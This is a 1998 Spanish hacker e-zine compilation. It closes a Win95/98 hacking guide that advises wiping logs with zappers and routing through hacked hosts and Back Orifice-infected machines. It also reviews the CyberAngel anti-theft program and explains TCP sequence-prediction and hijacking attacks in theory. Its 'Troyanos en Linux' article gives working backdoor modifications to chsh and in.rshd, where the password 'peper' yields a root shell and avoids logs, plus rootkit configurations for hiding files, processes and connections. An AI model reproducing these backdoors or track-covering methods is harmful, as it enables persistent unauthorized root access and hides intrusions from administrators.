- la seguridad personal, de nuestro ordenador, etc... Para que nadie pueda
- jodernos aunque nos movamos por Win95/98.
-
- 6-1. Protegiendo Nuestro Ordenador.
-
- Nuestro ordenador corriendo con Win95/98, sera propenso a muchos tipos de
- ataques diferentes. Por ello conviene estar preparado y sobre estar
- alerta sobre las nuevas cosas que surgen por el mundo Underground, el mejor
- medio son los e-zines y por supuesto buenos amigos por el IRC.
-
- 6-1-1. Ataques Tipicos a Nuestro Windows.
-
- Logicamente seremos muy propensos a ataques tipo DoS (denial of service),
- como son el LAND, BONK, TEARDROP y por supuesto los famosos nukes, OOB,
- etc ...
-
- Para estar protegidos lo que tenemos que hacer es pasarnos por los
- web's de seguridad o el de la casa Microsoft en los cuales se cuelgan
- los parches de estos ataques. No siempre funcioran pero nos ahorraran
- muchos disgustos en muchos casos. La gente suele ser muy propensa a estas
- cosas porque no esta informada sobre estos ataques y por consiguiente
- no se instala los parches correspondientes.
-
- 6-1-2. Encriptacion de Nuestra Informacion.
-
- La informacion sensible que tengamos en nuestro disco duro conviene que
- este encriptada con algun buen programa de encriptacion del tipo PGP, el
- cual no puede ser roto en estos tiempos.
-
- Tambien podemos hacer uso de la Stereografia, el arte de ocultar la
- informacion. Hay varios programas en Internet que nos permiten esconder
- ficheros de txt en ficheros graficos o de sonido, por supuesto habra
- que tener cuidado cuando hacemos estas operaciones, debido a la diferencia
- de formatos entre los ficheros.
-
- Incluso podemos encriptar todo o parte del disco duro para mayor seguridad
- en nuestros datos.
-
- Lo recomendado es usar el PGP 5.0 o incluso la version 6, las cuales nos
- seran de gran utilidad para encriptar nuestros ficheros ademas como son
- para Windows todo sera por las tipicas ventanas, mas facil imposible.
-
- 6-1-3. Eliminar Informacion De Forma Segura.
-
- Cuando borramos un fichero del disco duro, realmente no esta borrado, por
- lo que puede ser rescatado mediante herramientas especiales. Esto no
- es conveniente si por el caso nuestro ordenador cae en malos manos y nos
- ha dado tiempo a borrar algunos ficheros, no serviria de nada ya que
- podrian recuperar la informacion.
-
- Para borrar ficheros que contegan informacion muy privada o no queremos
- que nadie la pueda obtener, conviene borrar este fichero mediante algun
- programa especial para el borrado de ficheros. Existen por Internet
- programas muy buenos para ello o tambien podemos leernos un fichero
- sobre este tema, de recomendable lectura:
-
- Secure Deletion of Data from Magnetic and Solid-State Memory
-
- Peter Gutmann
- Department of Computer Science
- University of Auckland
- pgut001@cs.auckland.ac.nz
-
- El PGP version 5 y tambien la 6, disponen de una opcion para borrar un
- fichero de nuestro disco duro de forma segura o sea que no teneis excusa
- para no usarla!!!
-
- 6-1-4. Eliminacion De Virus.
-
- Los virus son una de las peores pesadillas, pero en realidad no entiendo
- porque, ya que son solo programas. Y no son dificiles de controlar. Solo
- conviene tener un buen antivirus o varios, si, tambien los hay por internet
- a patadas y gratis.
-
- Incluso muchos virus se pueden anular mediante un par de comandos del
- MS-DOS, es simplemente conocer un poco los virus, logicamente se sale de
- la tematica de esta guia. Pero la realidad es que no hay que tener miedo
- de los virus. Si nuestro ordenador esta infectado, lo primero que tenemos
- que hacer es calmarnos, luego hacer una copia de seguridad de nuestro
- disco duro (da igual si esta infectado), por si el virus, en el peor de
- los casos borra el disco duro y ahora buscar una vacuna disponible.
-
- Si fuese el caso que nuestro antivirus no quita el virus, pues simplemente
- hacemos una copia y lo enviamos a alguna empresa de seguridad informatica
- ya que seguro que nos sacan un antivirus.
-
- Los virus para Windows cada dia estan aumentando, por lo que conviene estar
- atento de que AntiVirus los pueden eliminar. No me estoy refiriendo a virus
- Macros sino a autenticos virus, incluso algunos capazes de borrar
- informacion de nuestro disco duro.
-
- Estos virus disponen de tecnicas stealh, polimorficos, etc. o sea que
- tened cuidado y estar alerta y tener unas buenas copias de seguridad, por
- si acaso.
-
- 6-2. Protegiendo Nuestras Acciones.
-
- Esta seccion esta enfocada a esconder nuestros actos hacking por Internet.
- Ya que todo lo que hagamos dejaremos huellas y por desgracia la gente no
- se entera de esto y deja muchas pistas.
-
- 6-2-1. Borrando Nuestras Huellas.
-
- Cuando conectamos a un servidor, este graba lo que hacemos (cuando hemos
- conectado, como, desde donde y varias cosas mas), por eso hay que tener
- mucho cuidado.
-
- La mayoria de servidores que hackeemos por Internet seran unix, conviene
- tener a mano "zappers", son programas que borran nuestras huellas en el
- servidor. Existen muchos programas para este proposito que funcionan bajo
- Unix. Solo los tenemos que compilar en el servidor y ejecutarlos. Por
- desgracia al usar Win95/98 no podemos compilarlos en nuestro ordenador y
- subirlo por FTP pero algo es algo.
-
- Tambien tenemos que procurar esconder nuestra IP, hay muchos metodos
- para ello, la mas facil es usar nodos (servidores intermedios y asi
- dificultar nuestro rastreo). Un esquema simple seria el siguiente:
-
- Hacker ------- Servidor ------ Servidor ------- Victima.
- | | | |
- Nosotros Primer servidor Segundo servidor Servidor victima
- para despistar para despistar
-
- Hoy en dia, podemos usar muy diferentes opciones para escondernos como por
- ejemplo, servidor que hayamos hackeado, sistemas con wingates o similares e
- incluso ordenadores que tenga el BO (Back Oriffice) instalado.
-
- 6-2-2. Encriptando Nuestro Correo.
-
- Conviene encriptar nuestro correo, sobre todo si esta relacionado con el
- hacking, ya que asi nadie podra saber que pone y acusarnos de nada. Siempre
- podemos alegar "Privacidad en los Datos" :). Al igual que antes hay varios
- paquetes de PGP para mail.
-
- Incluso es recomendable el uso de cuentas anomimas de correo, aunque de
- esto la gente esta mas concenciada.
-
- Volvemos a hacer uso de nuestro querido programa PGP version 5 o 6, a gusto
- del consumidor.
-
- 7. Sugerencias Para Un Mejor Hacking.
-
- Aqui hablare sobre algunas ideas que pueden potenciar el hacking en
- Win95/98 y la creacion de nuevas herramientas.
-
- - Programas troyanos que capturen el password del acceso a Internet.
-
- - Programas para IP-Spoof.
-
- - Creacion de herramientas de redes para Win95/98.
-
- - Wardialers.
-
- - Programas para atacar otros Win95/98 (DoS).
-
- - Nuevas Suites.
-
- - Programas crackeadores del passwd.
-
- - Programas criptograficos.
-
- - Programas eliminadores de ficheros de forma segura.
-
- - Puertas traseras.
-
- - Programas de administracion remota.
-
- - Programas DoS para saltarse protecciones.
-
- - Programas que realmente proporcionen seguridad a nuestro sistema.
-
- 8. Obtener Informacion.
-
- Todo el mundo esta harto de ver cientos de web's donde no hay nada o
- todo esta repetido. Pues ahora os pondre unas pautas que seguir para
- obtener la mayor fuente posible de informacion.
-
- - Web's sobre hack (que decir).
-
- - Web's sobre seguridad Informatica (aqui siempre podemos encontrar
- muchas cosas, que nos podran servir).
-
- - Los RFC (Informacion tecnica sobre Internet, protocolos, seguridad,
- etc...).
-
- - Libros de colores (Documentacion tecnica sobre seguridad en muchos
- aspectos).
-
- - News (estar en un grupo de news y asi recibir noticias de lo que pasa).
-
- - Mailing lists (aqui estaremos permanentemente informados).
-
- - IRC (podremos hablar con otros hackers y cambiar opiniones).
-
- 9. Despedida.
-
- Pues aqui se acaba esta guia sobre hacking en Win95/98. Espero que os halla
- gustado y os sea util, por todo el esfuerzo que ha llevado esta guia.
-
- Por desgracia me he dejado muchas cosas en el tintero, que me hubiese
- gustado explicar pero quien sabe a lo mejor aperece una nueva entrega
- nunca se sabe :)
-
- Me gustaria descatar que a lo mejor con los ultimos puntos de la guia, te
- has quedado sorprendido respecto a su titulo y despues al ver su contenido,
- esto se debe a que he preferido dar pautas a seguir y no empezar a explicar
- cosas que ya muchos sabran o que es informacion realmente facil de
- encontrar por Internet, ademas si empiezo a explicar algunos de esos
- titulos me saldria del proposito de esta guia, que es el hacking en Win95/98
- y NO de otros sistemas operativos los cuales disponen de miles de guias
- sobre hacking.
-
- Bueno ya solo me queda despedirme y tened cuidado con lo que haces por
- Internet, ya que un hacker no se dedica a destruir sistemas informaticos.
- Y agradecer a todos los que hallan escrito sus conocimientos sobre hack
- en win95/98 para la creacion de esta guia pero por supuesto que todavia
- quedan muchas cosas mas, esto es simplemente una solida base para
- comezar en tu "alter ego" como hacker!!!.
-
- 9-1. Agradecimientos.
-
- Y desde aqui saludar a todos aquellos que de alguna forma han
- participado en la creacion de esta guia, que son muchas asi como a todas
- las personas que me conocen :) Que no las listo aqui debido a que son
- muchisimas!!!!!
-
- Nobody (c) 1998.
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- CyberAngel: Un programa, un password, un monton de seguridad
- ------------------------------------------------------------
-
- By Mac Crack & Tasslehoff
- - J.J.F. / Hackers Team -
-
- 1.- Que es CyberAngel EXR?
- 2.- Como funciona?
- 2.1.- Configuration Manager
- 2.2.- Encriptacion
- 2.3.- Passwords incorrectas
- 2.4.- Alerta automatica
- 2.5.- Soporte tecnico
- 3.- Conclusion
-
- 1.- Que es CyberAngel EXR?
-
- CyberAngel EXR es un nuevo producto de la casa "Computer Sentry
- Software Inc." (http://www.sentryinc.com) enfocado a la seguridad de
- empresa. Es un programa que protege tus datos incluso si te han robado el
- ordenador. Lo bueno de este programa es que es muy facil de usar, tiene un
- precio razonable (unas 7000 pelas) una facil configuracion de seguridad y
- key recovery, lo unico malo es que, de momento, es un programa que solo
- funcina si se tiene un acceso via modem. Es un programa principalmente
- enfocado para portatiles y ordenadores de empresas.
-
- 2.- Como funciona?
-
- El funcionamiento del programa es relativamente simple, como su
- configuracion. Se instala el programa, pero seguros de que el ordenador
- esta conectado a la red, despues de copiarse los archivos, vas a una
- especie de registracion on-line, en la cual tienes unas opciones de
- configuracion, en el cual un password es requeridos para poder registrarlo,
- o sea, que el programa debe ser original, despues seleccionas el tipo de
- notificacion que quieres que te hagan cuando alguien ha conseguido entrar
- en tu ordenador. Tu password se necesita tambien para el soporte tecnico :o)
- Bien, ahora, cada vez que enciendes o apagas tu ordenador, o bien, lo
- reseteas tendras que poner tu passwd de CyberAngel, solo que la diferencia
- con los passwds tradicionales es que en este caso no te sale una pantallita
- pidiendote el passwd, por eso, la persona que entre/robe tu ordenador no
- sera consciente de que hay una proteccion puesta.
-
- 2.1.- Configuration Manager
-
- Es un interface muy sencillo y muy facil de usar para cambiar las
- preferencias del programa, requiere el disco original, tu passwd y el
- numero de serie. Esta aplicacion actualiza automaticamente la encriptacion
- de todas las "keys" (llaves) de tu ordenador.
-
- 2.2.- Encriptacion
-
- La ventana de encriptacion te muestra los todos los archivos que hay
- en tu ordenador y asi puedes seleccionar los archivos que quieres encryptar
- y tambien puedes seleccionar el tipo de algoritmo de encriptacion que
- desees. Pero, por ejemplo, si copias o cambias archivos de carpetas, el
- programa los desencripta automaticamente y vuelve a encriptar siempre y
- cuando se haya metido el passwd correcto.
- El sistema de encriptacion trabaja a unos 500KB de memoria, para
- hacer el trabajo de encriptacion/desencriptacion mas o menos rapido sin
- consumir muchos redcursos del ordenador. Cada fichero o carpeta de ficheros
- puede tener algoritmos de encritpacion distintos segun los hayas elegido.
- Por ejemplo puedes elegir desde 448-bit Blowfish, 56-bit DES, o
- 128-bit EXR. El tipo de encriptacion de 448 bit es generado aleatoriamente
- durante la instalacion del programa.
- CyberAngel, como muchos programas de encriptacion, no encripta
- ficheros .COM o .EXE, mas que nada por las protecciones contra reseteos,
- falta de corriente, etc. Durante la encriptacion, se genera un directorio
- de backup, el cual se borra automaticamente cuando se ha terminado la
- encriptacion y ha sido verificada correctamente por el programa. Cuando
- reseteas el ordenador y le pones de nuevo el passwd, los ficheros se
- desencriptan automaticamente y se tiene acceso a ellos, si no es correcto
- no tienes acceso.
-
- 2.3.- Passwords incorrectas
-
- Que pasa si alguien mete un passwd incorrecto?, bien, la respuesta es
- sencilla, CyberAngel EXR bloquea el ordenador, es decir, te cierra todos los
- puertos de comunicaciones, impidiendo que, si esta conectado a Internet,
- puedas entrar en cuentas, por ejemplo (nota: este programa tb puede ser
- usado para los niños, es decir una escpecie de CyberPatrol o NetNanny, o sea
- de estos programas para que los niños no entren en sitios guarros :o))
- Tambien se puede usar la opcion PLUS, que lo que hace es bloquear el
- teclado y el raton, restringiendo el acceso a ficheros, para copiarlos,
- bajarlos o bien imprimirlos.
-
- 2.4.- Alerta automatica
-
- CyberAngel EXR tiene un sistema de alerta automatica llamada "7x24
- CSS Security Monitoring" el cual te avisa via fax o e-mail si tu ordenador
- esta siendo utilizado sin autorizacion. El escaneo de tu ordenador lo hace
- ya este conectado desde un modem o via TCP/IP. Este escaneo lo hace el
- propio ordenador y esta intentando conectar al sistema de alerta hasta que
- consiga la linea para ello. Si el ordenador ha sido conectado a una linea
- de telefono, una red, LAN o WAN, manda una alerta encriptada, incluso quita
- el sonido al marcar para que el intruso no se de cuenta de lo que el
- ordenaodr esta haciendo.
-
- 2.5.- Soporte tecnico
-
- Tambien puedes llamar inmediatamente al servicio tecnico, el cual
- calificara tu ordenador de robado y generara un informe sobre tu ordenador,
- el cual incluye el IP desde donde el ordenador realizo la alerta, el numero
- de telefono, nombre, apellidos y direccion asociados de es numero de
- telefono. Despues de esto ya es otro asunto, se le manda el informe a la
- policia.
-
- 3.- Conclusion
-
- CyberAngel EXR es uno de los mejores programas del mercado para
- proteger datos. Es realmente facil de instalar y de usar. Diseñado para
- W95/98/NT. Tambien se puede hacer una instalacion en una red.
- Administradores de sistema encontraran este programa bastante util,
- ya que los usuarios podran seguir usando sus mismos passwords, asi que no se
- necesita reconfigurar para cada usuario. La encriptacion es "transparente",
- o sea que no sabes que esta haciendo el ordenador si eres un intruso.
- Cualquier password que se haya olvidado, se pueden volver a pedir al
- Monitoring Center. Es decir una buena herramienta para proteger tu
- ordenador.
-
- Preguntas, comentarios, etc...
- mac@jjf.org
- tasslehoff@jjf.org
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- - CURSO DE HACK -
- CHAPTER VII
-
- Bueno, pues aqui esta la septima entrega de vuestro curso favorito,
- aunque me gustaria saber si os esta sirviendo de algo o solo estoy
- escribiendo lineas inutilmente. Me alegraria mucho que enviarais mail
- contando vuestros progresos.
-
- Quiero dejar claro, que este curso no sigue un orden lineal, yo
- simplemente voy explicando temas y despues lo entrezalo, pero conviene que
- los lectores estudien por su cuenta, puede que algunos capitulos pueden
- ser muy faciles y otros de gran complejidad, como es el caso de hoy ;-)
- Este capitulo esta enfocado a distintos ataques en el protocolo TCP/IP.
- No veo la necesidad de explicar el manejo de Linux al igual que el
- funcionamiento de los protocolos, por lo que asumire un cierto
- conocimiento por parte del lector en estas interesantes y desconocidas
- materias.
-
- Si al comenzar tu lectura no entiendes nada de lo aqui explicado y
- como soy un buen chico :) os pongo unas cuantas url's donde podreis
- aprender de como funciona tecnicamente el protocolo TCP/IP.
-
- http://studys.mcs.mu.edu/~chong/mscs210/protocol.html/#ftp
- http://www.cis.ohio-state.edu/htbin/rfc/arpa-internet-protocols.html
- http://sunsite.auc.dk/RFC/rfc/rfc1180.html
- http://ipprimer.2ndlevel.net/
-
- Pues ya sabes, a leer se ha dicho! Y ahora empezemos este curso.
- Para este capitulo el Linux nos sera realmente util, ya que tendremos que
- retocar las cabezeras de los paquetes que enviemos a los servidores, asi
- como distintas herramientas. Debido al peligro que puede llevar la
- informacion de este articulo, solo lo explicare teoricamente y no
- expresamente como realizarlos, pero con algo de imaginacion lo podras
- conseguir :)
-
- # Ataque de prediccion de numeros.
-
- Este ataque siempre debe ser realizado antes de cualquier otra
- variante de ataques en el protocolo. Este ataque lo realizamos con el fin
- de acceder a la red que nos interesa. Este ataque contiene 2 pasos, el
- primero seria averiguar el IP del servidor que nos interesa, esto es
- realmente facil y lo podemos hacer de muchas maneras, hacemos esto porque
- otros ordenadores de esa red comparten valores con el servidor, entonces
- imitamos una IP de la red para saltarnos el router y conseguir acceso.
- Por ejemplo:
-
- X --------------------------> 195.0.0.10 (servidor)
- Hacker |
- | 195.0.0.1
- 195.0.0.2
- ...
- 195.0.0.255
-
- Aqui vemos con el hacker conoce la IP del servidor la cual es
- 195.0.0.10 por lo puede conocer otros sistemas de la red, en este caso
- de clase C. Ahora que ya conoce la red, el hacker comienza a monotizar
- el numero de secuencia de los paquetes que pasan por la red. Despues de
- un rato que ya sabemos como funciona, el hacker debe intentar predecir el
- numero de secuencia del servidor y "spofear" la secuencia, para meterse
- entre el servidor y el usuario de la red. Como el hacker conoce la IP
- del server puede generar numeros de secuencia para pasarselos al servidor y
- asi engañarle. Normalmente este ataque se suele usar como base para
- atacar un servidor o un sistema de la red. Un ejemplo del engaño:
-
- X ------------------------> 195.0.0.10 (servidor) 195.0.0.15
- Hacker | Usuario
- Simulamos que
- somos el IP
- 195.0.0.15
-
-
- # Ataque de robo de la conexion (IP Hijacking).
-
- Este ataque posiblemente es el mas peligroso que se puede cometer
- contra un servidor (tambien es conocido como "sniffing" activo). Este
- ataque que realizamos en el protocolo TCP, fuerza al servidor a aceptar
- nuestra conexion como si fueramos un IP de confianza (trust). Basicamente
- el ataque consiste en que conseguimos acceso en uno de los sistemas de la
- red del servidor que queremos entrar, entonces desconectamos el sistema de
- la red y hacemos creer al servidor que somos realmente la IP de confianza.
- Por ejemplo:
-
- X -------------------> 195.0.0.10 ---- ------ 195.0.0.15
- Hacker | (servidor) | Usuario
- | |
- Simulamos ser Hemos cortado
- el IP 195.0.0.15 la conexion autentica.
-
- Este ataque es potencialmente mas peligroso que el "IP Spoofing",
- debido a que si sale exitoso, se consegui mucho mas acceso al servidor e
- incluso podemos evadir los mecanismos de seguridad.
-
- # Ataque sniffer.
-
- Este tipo de ataque el realmente comun en Internet, tambien es
- conocido como ataque pasivo. Normalmente este puede ser el primer paso
- que un hacker realiza, debido a que puede conseguir informacion para
- despues realizar otro tipo de ataque potencialmente mas peligroso. Este
- ataque seguramente es el mas facil de realizar, simplemente necesitamos
- el Login y el Password de un usuario de la red, entonces entramos en la
- cuenta y colocamos un sniffer para reunir informacion de la red.
- Por ejemplo:
-
- |-> Servidor --|
- | |
- Sistema RED Sistema
- | |--------------> X (hacker) Copiamos los
- |-- Sistema <-|<---------------| paquetes TCP que
- Paquetes TCP vamos monotorizando.
-
- Como vemos el hacker copia todos los paquetes que pasan por la red,
- con el fin de sacar informacion para un ataque de mayor envergadura, como
- por ejemplo "IP Spoofing" o "IP Hijacking".
-
- # Ataque de desincronizacion activa.
-
- Este ataque se basa, en que el hacker fuerza a los dos sistemas de
- la comunicacion TCP a un estado de desincronizacion para que no puedan
- cambiar informacion entre si, entonces el hacker utiliza un tercer sistema
- (ordenador) que este entre la conexion TCP creando paquetes para
- remplazarlos y pasarlos a cada extremo de la conexion TCP, con lo que
- el hacker obtiene todos los paquetes de la conexion original.
-
- # Ataque de robo de previa-desincronizacion.
-
- Este ataque es una variante del Hijacking y se basa en el que el
- hacker es capaz de escuchar todos los paquetes entre los 2 sistemas que
- se estan comunicando, ademas el hacker es capaz de cambiar los paquetes
- originales por unos falsos para esconder del cliente y del servidor. Esta
- conbinacion permirte al hacker forzar la comunicacion entre el cliente
- y el servidor.
-
- Supongamos que el hacker ha conseguido desencronizar la comunicacion,
- entonces el cliente envia un paquete con la siguiente cabezera:
-
- SEG_SEQ = CLT_SEQ
- SEG_ACK = CLT_ACK
-
- Como el hacker ha desencronizado la comunicion el paquete del cliente
- no sera aceptado por el servidor debido a que la informacion es incorecta.
- Entonces el hacker copia el paquete rechazado por el servidor. Pasado un
- ratito el hacker envia el mismo paquete rechazado pero cambiando la
- cabezera:
-
- SEQ_SEQ = SVR_ACK
- SEG_ACK = SVR_SEQ
-
- Esta vez la cabezera es correcta por lo que el paquete si sera
- aceptado por el servidor. Este ataque no acaba aqui realmente pero lo dejo
- en este punto, para que os pique la curiosidad y busqueis informacion.
- Deciros que este ataque nos puede servir para saltarnos la seguridad de
- un servidor Web con SSL incluido ;-)
-
- Existen muchos ataque todavia en el TCP/IP que aqui no explico, quien
- sabe si en algun futuro numero lo hago :) Por ejemplo ACK Storm, ataques
- de Telnet, y unos nuevos ataques que se descubrieron a principios de año
- (1998), conocidos como Insercion y Evasion que permiten saltarte muchos
- IDS (Sistema de deteccion de Intrusos).
-
- Lo mejor para aprender sobre este tipo de cosa es siempre tener a
- mano los famosos RFC y Linux o FreeBSD, herramientas que nos permitan
- cambiar los paquetes, asi como interceptarlos, etc...
-
- Byes all y hasta la vista !!
-
- CONDE VAMPIRO
- - J.J.F. / HACKERS TEAM -
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- ****************************************************
- ** Troyanos en Linux **
- ****************************************************
-
- Holas. He decidido escribir este articulo para ayudar a la gente que
- esta empezando en esto del hack, bueno.. empezando empezando no, tiene que
- tener un nivel minimo; saber manejarse algo en entornos unix, algo de
- programacion en C (tarde o temprano tendras que aprender), y cosas de ese
- estilo, pero mas o menos creo que cualquiera que tenga unos minimos
- conocimientos le sacara provecho. Tampoco va a ser un supertexto, mas bien
- sera un texto practico que servira para aclarar ideas de que es un troyano,
- como instalarlo, etc., y por si alguien lo esta pensando no se trata de
- troyanos tipo "Bo" y similares, sino que seran troyanos aplicables solo al
- entorno linux.
-
- .- Que es un troyano?
-
- Pues es, mas o menos, un programa modificado a tu gusto que lo pones
- sobreescribiendo al original, de forma que las modificaciones que hayas
- hecho te sirvan para algo claro, por ejemplo que te den root facilmente y
- sin huellas, para ocultar cosas al administrador (directorios, conexiones),
- etc.
-
- .- Tipos basicos de troyanos.
-
- Yo mas o menos los he dividido en 3 tipos; troyanos para conseguir
- root local, troyanos para conseguir root remoto y troyanos para ocultar
- cosas de todo tipo como pueden ser directorios, procesos, conexiones, etc.
-
- *- Troyanos para conseguir root local:
- --------------------------------------
-
- Estos troyanos normalmente siempre se colocan nada mas haber obtenido
- root en la makina. Esto se hace asi porque normalmente se instalan en un
- segundo, ya que son muy simples, y te evita comerte el coco para conseguir
- root otra vez si es que al administrador le da por parchear el bug por el
- que has conseguido privilegios, aunque esto deberias hacerlo tu por etica y
- tal..., aparte que asi te evitas que vengan otros y se te apoderen
- facilmente de "tu" sistema jeje.
-
- Troyanos de este tipo por ejemplo son el chsh, que es un programa que
- sirve para cambiarte la shell, por ejemplo de bash a zsh. Al ejecutarlo te
- pide una nueva shell, por lo que es muy facil modificarlo para que dandole
- una shell determinada te habra una shell con uid 0. Por cierto que los
- troyanos que salgan en este articulo los podeis conseguir en
- http://welcome.to/neptuno
-
- Como no voy a poner todo el codigo fuente aqui, pongo las lineas que
- estan modificadas y las explico un poco. Las fuentes de linux es muy
- recomendable tenerlas a mano y las podeis conseguir o de los cds de debian
- (p.ejemplo), o de ftp.rediris.es (login:ftp), en el directorio
- /linux/debian/source.
-
- Los troyanos muchas veces se hacen con simples ifs (condicionales) y
- poco mas. En este caso lo que hace es declarar un entero con int elite=0; y
- un password con char clave[6]=peper; al principio del fichero (sino sabeis C
- lo tendreis un poco chungillo pa entender esto pero bueno). Peper sera lo
- que tengais que poner cuando os pida la nueva shell al ejecutar el programa.
-
- Ahora pego la chicha del codigo.
-
- if (!strcmp(shell,clave)) elite++; /* --> Aqui compara la shell con nuestro
- password (peper) y si son iguales
- pone elite a 1 */
-
- if (!elite) { /* --> Todo esto se la salta si elite esta a 1, o sea si
- metimos el password correcto */
-
- if (check_shell (shell) < 0) return (-1);
-
- if (! strcmp (pw->pw_shell, shell)) {
- printf ("Shell not changed.\n");
- return 0;
- }
- if (!strcmp(shell, "/bin/sh")) shell = "";
- pw->pw_shell = shell;
- if (setpwnam (pw) < 0) {
- perror ("setpwnam");
- printf( "Shell *NOT* changed. Try again later.\n" );
- return (-1);
- }
- printf ("Shell changed.\n");
- return 0; }
- if (elite) { /* Aqui si elite esta a 1 pone nuestro uid y gid a 0, o sea
- el del root, setea HISTFILE para evitar el .bash_history
- y ejecuta una shell */
-
- setreuid(0,0);
- setregid(0,0);
- setenv("HISTFILE","",1);
- system("/bin/bash");
- }
- }
-
- Y eso es todo, ya tenemos un troyano que al ejecutarlo y darle de
- shell peper nos abrira una shell de root. Por cierto, que este troyano para
- funcionar tiene que tener suid de root, pero como el chsh original tambien
- lo tiene es dificil que el administrador se de cuenta del cambio. Recordad
- que la fuente entera la podeis bajar de http://welcome.to/neptuno . Chsh
- normalmente esta en /usr/bin.
-
- *- Troyanos para conseguir root remoto:
- ---------------------------------------
-
- Este otro tipo de troyanos se utiliza para mantener el acceso a la
- makina hackeada. De esta forma es muy facil entrar como root desde fuera,
- evitando todos los logs que deja hacer un simple telnet a una cuenta.
-
- El tipico troyano de este tipo es el del programa login, normalmente
- situado en /bin. Lo que pasa que este programa es bastante complejo (sobre
- todo si el password esta shadow), por lo que no me iba a tirar yo aqui horas
- explicando y pegando mogollon de codigo fuente (en mi page pondre en breve
- uno hecho por mi por si a alguien le interesa), asi que pondre uno mas
- sencillo como puede ser el del rshd.
-
- El rshd es un servicio parecido al rlogin, pero que en vez de abrirte
- una shell permite ejecutar comandos remotos, lo que no quita que tu puedas
- ejecutar el comando /bin/bash por ejemplo abriendote una cuenta. Pues bien,
- el objetivo es que haciendo un rsh a la makina con un login determinado el
- programa ejecute el comando que tu le digas con uid 0, incluido el /bin/bash
- y practicamente sin logs. Para que funcione tendras que sobreescribir el
- original, normalmente en /usr/sbin/in.rshd, y que el servicio este activado
- en el /etc/inetd.conf claro. Pasemos a la explicacion..
-
- Lo primero que hace es declarar un entero con int elite=0;, o sea,
- igual que antes con el chsh. Luego declara el password que se va a usar para
- entrar como root con char clave[6]=peper;, por cierto que si cambias peper
- por otra clave acuerdate de modificar el 6 por el numero de letras que
- tenga +1. Luego hay esto..
-
- getstr(locuser, sizeof(locuser), "locuser");
- getstr(cmdbuf, sizeof(cmdbuf), "command");
- if (!strcmp(locuser,clave)) { elite++; strcpy(locuser,"root"); }
-
- En esta ultima linea esta todo el troyano; compara el login (o sea el
- usuario) con el nuestro, y si coinciden pone elite a 1 y copia el string
- root al login. Como veis casi todos los troyanos hacen cosas muy parecidas.
- Despues ya ahi cosas tipicas, como:
-
- if ((paranoid || pwd->pw_uid == 0)&&(!elite)) {
- syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: cmd='%s'",
- remuser, hostname, locuser, cmdbuf);
-
- que lo que hace es evitar el syslog si entramos con nuestra clave,
- etc. Para usar el troyano, despues de haber sobreescrito el
- /usr/sbin/in.rshd, hay que hacer un rsh -l nuestraclave(peper_en_este_caso)
- makina.com /bin/bash. Despues hay que borrar nuestra entrada del
- /var/log/secure, ya que ese log el troyano no lo evita, en cambio si setea
- el HISTFILE, o sea el .bash_history.
-
- Bueno, y con eso ya tenemos garantizado el acceso remoto como root, y
- por si falla ya tenemos un troyano local para entrar con una cuenta de un
- usuario y conseguir root facilmente. Ahora lo que viene ya son troyanos
- para sacar provecho de esa makina; poner algun bot, bouncers, ocultar
- sniffers, etc. Por cierto, y ya no lo repito mas, que los troyanos los
- podeis encontrar en http://welcome.to/neptuno (bueno, y en miles de sitios
- de internet claro).
-
- *- Troyanos para ocultar directorios, procesos..etc.
- ----------------------------------------------------
-
- Ahora llegan los troyanos para ocultar ficheros, procesos, conexiones,
- o sea, para ocultar todo lo ocultable jeje (tranquilos que ya keda poco de
- texto ;).
-
- Para empezar esta el troyano de ls, que normalmente estara en /bin/ls
- (Ahora ya pasare de poner los codigos porque sino me enrollo mucho y mas o
- menos son todos iguales). Como decia este troyano sirve para ocultar
- ficheros y directorios, y para funcionar necesita tener la referencia en un
- archivo de donde vaya sacando los nombres de ficheros y directorios a
- ocultar. Puedes poner los nombres dentro del codigo y te ahorras el archivo
- ese, pero no creo que sea plan andar compilando todo el dia cada vez que
- quieras ocultar un nuevo fichero (y aparte que tendrias que subirlo de nuevo
- a la makina cada vez). Normalmente en el codigo hay una linea que pone algo
- asi como #define PATH "/dev/ptyr", que es el archivo de donde cogera los
- datos, que por cierto yo que tu lo cambiaba ahora mismo, mas que nada
- porque ya estan muy vistos. Bueno, pues despues de haber sobreescrito el
- /bin/ls con el troyano, si por ejemplo quieres ocultar un directorio con
- nombre pepito pues en /dev/ptyr añades una linea con la palabra pepito, y
- lo mismo con los archivos. Por cierto, supongo que no hace falta que diga
- que al /dev/ptyr le añadas una linea con la palabra ptyr ;)
- (Nota: si el admin ve el directorio desde algun tipo de visor grafico
- desde las X el troyano no hara nada y vera los ficheros y directorios
- ocultos).
-
- Despues esta el troyano de ps y top, que son para ocultar procesos, el
- archivo de informacion es normalmente el /dev/ptyp, y se utiliza de la
- siguiente forma.
-
- Ej. de /dev/ptyp:
-
- 0 0 Oculta todos los procesos corriendo bajo uid 0
- 1 p0 Oculta todos los procesos bajo tty p0
- 2 sniff Oculta todos los procesos cuyo nombre sea sniff
- 3 hack Oculta todos los procesos en cuya linea de
- ejecucion aparezca la palabra hack.
- (ej. hack makina.com -0)
-
- Hay que sobreescribir los originales normamente en /bin/ps y
- /usr/bin/top, el fichero ptyp es el mismo para los dos. Si consigues este
- troyano, al igual que el de ls en algun rootkit y no te compila bajatelos
- de la web que llevo repitiendo todo el articulo, ya que estan optimizados
- para libc6 (supongo que en tambien libc5 compilaran).
-
- Bueno, y por ultimo keda el del netstat, que sirve para ocultar
- conexiones, puertos abiertos, etc etc. Ya se que hay 2.235.678,93 de
- troyanos mas pero sino este articulo me ocuparia paginas y paginas, a parte
- de que estos son los mas basicos. Y sino os bajais algun rootkit que traen
- muchisimos, lo que pasa que tambien muchisimos no compilaran porque faltan
- librerias, archivos de cabezera.. etc :(
-
- Bueno, lo que iba diciendo, el del netstat. Normalmente el archivo de
- informacion de este es /dev/ptyq, y esta organizado de la siguiente forma,
- que ilustrare con un ejemplo :)
-
- 0 500 <- Oculta las conexion hechas por el uid 500
- 1 128.31 <- Oculta las conexiones desde 128.32.xx.xx
- 2 128.31.39.20 <- Oculta las conexiones a 128.31.39.20
